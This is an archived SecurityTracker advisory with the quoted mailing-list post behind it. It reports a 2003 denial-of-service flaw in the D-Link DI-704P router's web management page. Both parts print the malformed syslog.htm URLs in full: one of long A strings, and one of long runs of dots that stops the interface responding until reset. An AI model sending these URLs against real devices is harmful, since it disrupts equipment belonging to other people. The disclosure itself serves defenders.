SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   D-Link Router Vendors:   D-Link Systems, Inc.
D-Link DI-704P Router Can Be Crashed By Remote Authenticated Users
SecurityTracker Alert ID:  1006856
SecurityTracker URL:  http://securitytracker.com/id/1006856
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 27 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): DI-704P
Description:   A denial of service vulnerability was reported in the D-Link DI-704P Router. A remote authenticated user can cause the management interface to stop responding.

It is reported that a remote authenticated user can send a specially crafted URL to the router's management interface to cause abnormal behavior.

The following type of URL will reportedly cause the device to perform a DNS query:

http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

The resulting DNS query is:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@xxxx.xx.comcast.net

If multiple such URL requests are submitted, temporary denial of service conditions may occur on the router.

The following type of URL will cause the management interface to stop responding until the device is reset (however, the router will continue to function):

http://192.168.0.1/syslog.htm?
D=.........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
....................

If the above-listed URL is sent many times, the router may stop functioning until reset.

The vendor has reportedly been notified.

Impact:   A remote authenticated user can cause the management interface to stop responding and may be able to cause the device to stop functioning until reset.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.dlink.com/products/broadband/di704p/ (Links to External Site)
Cause:   Exception handling error

Message History:   None.


 Source Message Contents

Subject:  Buffer Overflow? Local Malformed URL attack on D-Link 704p router




My home network uses a small 4 port broadband Dlink router (704p) The 
firmware was updated a week ago.

The following malformed URL's cause odd behavior in the router. Pointing 
your browser (like most routers) to the gateways internal IP address you 
get a web interface for administering your router. 

http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

This URL caused the router to do a DNS query on:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@xxxx.xx.comcast.net

"@xxxx.xx.comcast.net" is the trailing end of my hostname (i replaced the 
real trailing host name with x's as to not give up my location! heh)


Subsequently there was a DNS response "no such name"
Enough of these malformed URLS causes the DNS server to DoS the router for 
a short time because a DNS response packet is much larger then a DNS query 
packet. 
This URL also caused an error in the routers log file page, the URL
made the page look odd. This router uses CSS to display its tabs and log 
file (syslog.htm). Some of the HTML was visible within the CSS that were 
now repeating across the page. I took a screen shot and uploaded it to my 
webspace.

http://www.securityindex.net/router.JPG

---

http://192.168.0.1/syslog.htm?
D=.........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
....................
This malformed URL caused the router to stop responding. Requesting this
url over and over will eventually render the router useless until reset.
You can still access the internet after sending this url once but the 
routers configuration page does not respond until you reset the router.

-->
 i sent an email to dlink containing a copy of this post. Thanx
-->

--chris

www.securityindex.net

-apex security group-

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC